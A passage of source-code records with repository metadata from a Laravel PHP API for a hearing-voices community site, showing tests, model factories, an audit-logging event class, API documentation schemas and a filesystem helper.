factory(Audit::class)->create(['user_id' => $admin->user->id]);\n        $notification = factory(Notification::class)->create(['user_id' => $admin->user->id]);\n        $fileToken = $this->createPngFile()->fileTokens()->create(['user_id' => $admin->user->id]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n        $this->assertDatabaseMissing('admins', ['id' => $admin->id]);\n        $this->assertDatabaseMissing('users', ['id' => $admin->user->id]);\n        $this->assertDatabaseMissing('audits', ['id' => $audit->id]);\n        $this->assertDatabaseMissing('notifications', ['id' => $notification->id]);\n        $this->assertDatabaseMissing('file_tokens', ['id' => $fileToken->id]);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_destroy(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\Admin $admin */\n        $admin = factory(Admin::class)->create();\n\n        /** @var \\App\\Models\\User $user */\n        $user = factory(Admin::class)->create()->user;\n\n        Passport::actingAs($user);\n\n        
$this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($admin, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Deleted admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.552830159664154,
"alphanum_fraction": 0.5754716992378235,
"avg_line_length": 24.238094329833984,
"blob_id": "6c8f9bc04f123849d321fef50e42fdbac0517248",
"content_id": "b9ec78e527aeacd28f4273940c61cc8956a63ed2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 530,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 21,
"path": "/database/factories/AdminFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Admin;\nuse App\\Models\\User;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Admin::class, function (Faker $faker): array {\n return [\n 'user_id' => function () {\n return factory(User::class)->create([\n 'email_verified_at' => Date::now(),\n ])->id;\n },\n 'name' => $faker->firstName,\n 'phone' => '07000000000',\n ];\n});\n"
},
{
"alpha_fraction": 0.596759021282196,
"alphanum_fraction": 0.5969939231872559,
"avg_line_length": 21.52910041809082,
"blob_id": "ac3702ada880ea09f89760369dcf370a8e1608db",
"content_id": "6104ebf9700ec8acb7da0f34b5a7f883a3d557ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4258,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 189,
"path": "/app/Events/EndpointInvoked.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events;\n\nuse App\\Models\\Audit;\nuse App\\Models\\User;\nuse Carbon\\CarbonImmutable;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Queue\\SerializesModels;\nuse Illuminate\\Support\\Facades\\Date;\nuse Laravel\\Passport\\Client;\n\nclass EndpointInvoked\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\User|null\n */\n protected $user;\n\n /**\n * @var \\Laravel\\Passport\\Client|null\n */\n protected $client;\n\n /**\n * @var string\n */\n protected $action;\n\n /**\n * @var string\n */\n protected $description;\n\n /**\n * @var string\n */\n protected $ipAddress;\n\n /**\n * @var string|null\n */\n protected $userAgent;\n\n /**\n * @var \\Carbon\\CarbonImmutable\n */\n protected $createdAt;\n\n /**\n * EndpointInvoked constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param string $action\n * @param string $description\n */\n protected function __construct(Request $request, string $action, string $description)\n {\n $this->user = $request->user('api');\n $this->client = optional($this->user)->token()->client ?? null;\n $this->action = $action;\n $this->description = $description;\n $this->ipAddress = $request->ip();\n $this->userAgent = $request->userAgent() ?: null;\n $this->createdAt = Date::now();\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onLogin(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_LOGIN, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onLogout(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_LOGOUT, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onCreate(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_CREATE, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onRead(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_READ, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onUpdate(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_UPDATE, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onDelete(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_DELETE, $description);\n }\n\n /**\n * @return \\App\\Models\\User|null\n */\n public function getUser(): ?User\n {\n return $this->user;\n }\n\n /**\n * @return \\Laravel\\Passport\\Client|null\n */\n public function getClient(): ?Client\n {\n return $this->client;\n }\n\n /**\n * @return string\n */\n public function getAction(): string\n {\n return $this->action;\n }\n\n /**\n * @return string\n */\n public function getDescription(): string\n {\n return 
$this->description;\n }\n\n /**\n * @return string\n */\n public function getIpAddress(): string\n {\n return $this->ipAddress;\n }\n\n /**\n * @return string|null\n */\n public function getUserAgent(): ?string\n {\n return $this->userAgent;\n }\n\n /**\n * @return \\Carbon\\CarbonImmutable\n */\n public function getCreatedAt(): CarbonImmutable\n {\n return $this->createdAt;\n }\n}\n"
},
{
"alpha_fraction": 0.6434231400489807,
"alphanum_fraction": 0.6450079083442688,
"avg_line_length": 24.239999771118164,
"blob_id": "8b0bfd1816a37742bc5bd8886e9fd5cd50783d12",
"content_id": "14e0ba82466a33a77000f29190991cd1746bccc5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 631,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 25,
"path": "/app/Docs/Schemas/Setting/EmailContentSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Setting;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass EmailContentSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('subject'),\n Schema::string('body')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5632065534591675,
"alphanum_fraction": 0.568345308303833,
"avg_line_length": 27.617647171020508,
"blob_id": "74670eb314cc8ea6f66084179c2064344b84e38f",
"content_id": "d052009593ce387a85823000413c638e5d0cd357",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 973,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 34,
"path": "/app/Http/Resources/AuditResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Audit $resource\n */\nclass AuditResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'admin_id' => $this->resource->user->admin->id ?? null,\n 'end_user_id' => $this->resource->user->endUser->id ?? null,\n 'client' => $this->resource->client->name ?? null,\n 'action' => $this->resource->action,\n 'description' => $this->resource->description,\n 'ip_address' => $this->resource->ip_address,\n 'user_agent' => $this->resource->user_agent,\n 'created_at' => $this->resource->created_at->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6728395223617554,
"alphanum_fraction": 0.6790123581886292,
"avg_line_length": 19.25,
"blob_id": "d6b422d92dc26e70e90332d179a8f142e3e2088f",
"content_id": "094429d1f8e719bedbbae9a38cd83f9c30f5e3ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 162,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 8,
"path": "/resources/js/docs.js",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "import SwaggerUI from 'swagger-ui';\n\nSwaggerUI({\n dom_id: '#swagger-ui',\n url: '/docs/openapi.json',\n defaultModelsExpandDepth: -1,\n docExpansion: 'none'\n});\n"
},
{
"alpha_fraction": 0.5464247465133667,
"alphanum_fraction": 0.5474919676780701,
"avg_line_length": 23.657894134521484,
"blob_id": "58d0af5d95d4da83ca0077006e2208a256feaea1",
"content_id": "f0adc8348edf5e709377d0470778dfec3d750f78",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 937,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 38,
"path": "/app/Support/Filesystem.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse App\\Exceptions\\RiskyPathException;\nuse Illuminate\\Support\\Str;\n\nclass Filesystem\n{\n /**\n * @param string $dir\n * @param string[] $excludes\n */\n public function clearDir(string $dir, array $excludes = []): void\n {\n // Safety precaution to ensure that only directories within the app can be cleared.\n if (!Str::startsWith($dir, storage_path())) {\n throw new RiskyPathException($dir);\n }\n\n // Don't do anything if the directory doesn't exist.\n if (!is_dir($dir)) {\n return;\n }\n\n $files = array_diff(\n scandir($dir),\n array_merge(['.', '..'], $excludes)\n );\n\n foreach ($files as $file) {\n $filePath = sprintf('%s/%s', $dir, $file);\n is_dir($filePath) ? $this->clearDir($filePath, $excludes) : unlink($filePath);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5313174724578857,
"alphanum_fraction": 0.5385169386863708,
"avg_line_length": 20.045454025268555,
"blob_id": "a48179a84f6e985f2d738f39e21d8667d567cfdc",
"content_id": "87f42624f7ec777167584309f0350cef53d3c90a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1389,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 66,
"path": "/tests/Unit/Support/PaginationTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Support\\Pagination;\nuse Tests\\TestCase;\n\nclass PaginationTest extends TestCase\n{\n /** @test */\n public function ten_returns_ten(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n 10,\n $pagination->perPage(10)\n );\n }\n\n /** @test */\n public function one_returns_one(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n 1,\n $pagination->perPage(1)\n );\n }\n\n /** @test */\n public function max_returns_max(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n (int)config('connecting_voices.pagination.max'),\n $pagination->perPage((int)config('connecting_voices.pagination.max'))\n );\n }\n\n /** @test */\n public function zero_returns_one(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n 1,\n $pagination->perPage(0)\n );\n }\n\n /** @test */\n public function one_more_than_max_returns_max(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n (int)config('connecting_voices.pagination.max'),\n $pagination->perPage((int)config('connecting_voices.pagination.max') + 1)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5267123579978943,
"alphanum_fraction": 0.5383561849594116,
"avg_line_length": 28.200000762939453,
"blob_id": "c4dbefc8992b6455a2cba254e758484e3bb849e4",
"content_id": "4bc83c337caaed7b50ff25b460de5b4345577f1a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1460,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 50,
"path": "/app/Http/Requests/EndUser/StoreEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Validation\\Rule;\n\nclass StoreEndUserRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'email' => ['bail', 'required', 'email', 'max:255', 'unique:users'],\n 'password' => ['bail', 'required', 'string', 'min:1', 'max:255'],\n 'country' => ['bail', 'string', 'max:255'],\n 'birth_year' => [\n 'bail',\n 'integer',\n Rule::min(Date::today()->year - Config::get('connecting_voices.age_requirement.max')),\n Rule::max(Date::today()->year - Config::get('connecting_voices.age_requirement.min')),\n ],\n 'gender' => ['bail', 'string', 'max:255'],\n 'ethnicity' => ['bail', 'string', 'max:255'],\n ];\n }\n\n /**\n * Get custom messages for validator errors.\n *\n * @return array\n */\n public function messages()\n {\n return [\n 'email.unique' => sprintf(\n 'The account has been withdrawn. Please contact the admin team via %s for more info.',\n config('connecting_voices.admin_email')\n ),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5650460124015808,
"alphanum_fraction": 0.5698642134666443,
"avg_line_length": 31.154930114746094,
"blob_id": "ff6401e1bba2987cf80ce388a0e9b6ddaff17f50",
"content_id": "0ca59f4233060a15a26db9fcab3ea8ebf458f780",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2283,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 71,
"path": "/tests/Unit/Services/AuditServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Audit\\AuditCreated;\nuse App\\Models\\Audit;\nuse App\\Services\\AuditService;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass AuditServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_an_audit_record(): void\n {\n /** @var \\App\\Services\\AuditService $auditService */\n $auditService = resolve(AuditService::class);\n\n $ipAddress = $this->faker->ipv4;\n $userAgent = $this->faker->userAgent;\n $createdAt = Date::now();\n\n $audit = $auditService->create([\n 'user_id' => null,\n 'client_id' => null,\n 'action' => Audit::ACTION_CREATE,\n 'description' => 'Lorem ipsum',\n 'ip_address' => $ipAddress,\n 'user_agent' => $userAgent,\n 'created_at' => $createdAt,\n ]);\n\n $this->assertDatabaseHas('audits', ['id' => $audit->id]);\n $this->assertEquals(null, $audit->user_id);\n $this->assertEquals(null, $audit->client_id);\n $this->assertEquals(Audit::ACTION_CREATE, $audit->action);\n $this->assertEquals('Lorem ipsum', $audit->description);\n $this->assertEquals($ipAddress, $audit->ip_address);\n $this->assertEquals($userAgent, $audit->user_agent);\n $this->assertEquals($createdAt->toIso8601String(), $audit->created_at->toIso8601String());\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([AuditCreated::class]);\n\n /** @var \\App\\Services\\AuditService $auditService */\n $auditService = resolve(AuditService::class);\n\n $audit = $auditService->create([\n 'user_id' => null,\n 'client_id' => null,\n 'action' => Audit::ACTION_CREATE,\n 'description' => 'Lorem ipsum',\n 'ip_address' => $this->faker->ipv4,\n 'user_agent' => $this->faker->userAgent,\n 'created_at' => Date::now(),\n ]);\n\n Event::assertDispatched(\n AuditCreated::class,\n function (AuditCreated $event) use ($audit): bool {\n return $event->getAudit()->is($audit);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.46759653091430664,
"alphanum_fraction": 0.4677666127681732,
"avg_line_length": 40.40140914916992,
"blob_id": "eb2cb89b4671f7343b4328d4e7f9f542e5f2f087",
"content_id": "7f05ce93141c750288b71eee47111de0c902d70f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5879,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 142,
"path": "/tests/Unit/Services/SettingServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Setting\\SettingsUpdated;\nuse App\\Services\\SettingService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass SettingServiceTest extends TestCase\n{\n /** @test */\n public function it_updates_the_settings(): void\n {\n /** @var \\App\\Services\\SettingService $settingService */\n $settingService = resolve(SettingService::class);\n\n $settings = $settingService->update([\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $this->assertEquals($settings->find('frontend_content')->value, [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ]);\n $this->assertEquals($settings->find('email_content')->value, [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n 
Event::fake([SettingsUpdated::class]);\n\n /** @var \\App\\Services\\SettingService $settingService */\n $settingService = resolve(SettingService::class);\n\n $settings = $settingService->update([]);\n\n Event::assertDispatched(\n SettingsUpdated::class,\n function (SettingsUpdated $event) use ($settings): bool {\n foreach ($event->getSetting() as $eventSetting) {\n /** @var \\App\\Models\\Setting $eventSetting */\n /** @var \\App\\Models\\Setting|null $setting */\n $setting = $settings->firstWhere('key', $eventSetting->key);\n\n if ($setting === null) {\n return false;\n }\n\n if ($setting->isNot($eventSetting)) {\n return false;\n }\n }\n\n return true;\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6203446388244629,
"alphanum_fraction": 0.6209005117416382,
"avg_line_length": 34.27450942993164,
"blob_id": "ff35c441106d6395f9b7e34457e7ff11cd736c90",
"content_id": "473e3c3bf849bf3372608e6c85d2d386cb76aeb4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1799,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 51,
"path": "/app/Docs/Operations/Contributions/ShowContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific contribution')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n <<<'EOT'\n * If accessed by the public, then only public contributions will be accessible.\n * If access by an end user, then only public contributions and all of their own\n will be accessible.\n EOT\n )\n )\n ->tags(ContributionsTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6408977508544922,
"alphanum_fraction": 0.6417289972305298,
"avg_line_length": 26.976743698120117,
"blob_id": "14a64df61bbe1a721f60ffb9ea98acf4535a07c6",
"content_id": "96fea4ea95ba018e5c95ed6161d02ad35bcfa58d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1203,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 43,
"path": "/database/factories/ContributionFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Contribution::class, function (Faker $faker): array {\n return [\n 'end_user_id' => function (): string {\n return factory(EndUser::class)->create()->id;\n },\n 'content' => $faker->paragraph,\n 'status' => Contribution::STATUS_PUBLIC,\n 'status_last_updated_at' => Date::now(),\n ];\n});\n\n$factory->state(Contribution::class, Contribution::STATUS_PUBLIC, [\n 'status' => Contribution::STATUS_PUBLIC,\n]);\n\n$factory->state(Contribution::class, Contribution::STATUS_PRIVATE, [\n 'status' => Contribution::STATUS_PRIVATE,\n]);\n\n$factory->state(Contribution::class, Contribution::STATUS_IN_REVIEW, [\n 'status' => Contribution::STATUS_IN_REVIEW,\n]);\n\n$factory->state(\n Contribution::class,\n Contribution::STATUS_CHANGES_REQUESTED,\n function (Faker $faker): array {\n return [\n 'status' => Contribution::STATUS_CHANGES_REQUESTED,\n 'changes_requested' => $faker->paragraph,\n ];\n }\n);\n"
},
{
"alpha_fraction": 0.6746370792388916,
"alphanum_fraction": 0.6763449907302856,
"avg_line_length": 25.0222225189209,
"blob_id": "623bd424b32f44b2981aafa5caec7d1ac5534a82",
"content_id": "df5ec8ed8e9c1da6597206b4de487d32909710cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1171,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 45,
"path": "/app/Http/Controllers/V1/Admin/MeController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Admin;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\AdminResource;\nuse App\\Models\\Admin;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\nclass MeController extends ApiController\n{\n /**\n * MeController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware('auth:api');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(Request $request): JsonResource\n {\n $this->authorize('me', Admin::class);\n\n $admin = $request->user('api')->admin;\n\n event(EndpointInvoked::onRead($request, \"Viewed admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n}\n"
},
{
"alpha_fraction": 0.4872399866580963,
"alphanum_fraction": 0.49295249581336975,
"avg_line_length": 27.403879165649414,
"blob_id": "cac8f67b3258e36063657ff9c89db125eaa8aca5",
"content_id": "6b22fa6b55ead2db2c05486c70709e3e1a792afe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 16105,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 567,
"path": "/tests/Feature/V1/TagControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass TagControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_can_index(): void\n {\n $response = $this->getJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n $response = $this->getJson('/v1/tags');\n\n $response->assertJsonStructure([\n 'data' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson('/v1/tags');\n\n $response->assertJsonFragment([\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ]);\n }\n\n /** @test */\n public function can_sort_by_name_for_index(): void\n {\n $this->truncateTables('tags');\n\n $tag1 = factory(Tag::class)->create([\n 'name' => 'Alpha',\n ]);\n $tag2 = factory(Tag::class)->create([\n 'name' => 'Bravo',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/tags', ['sort' => '-name']);\n\n $response->assertNthIdInCollection(1, $tag1->id);\n $response->assertNthIdInCollection(0, $tag2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user 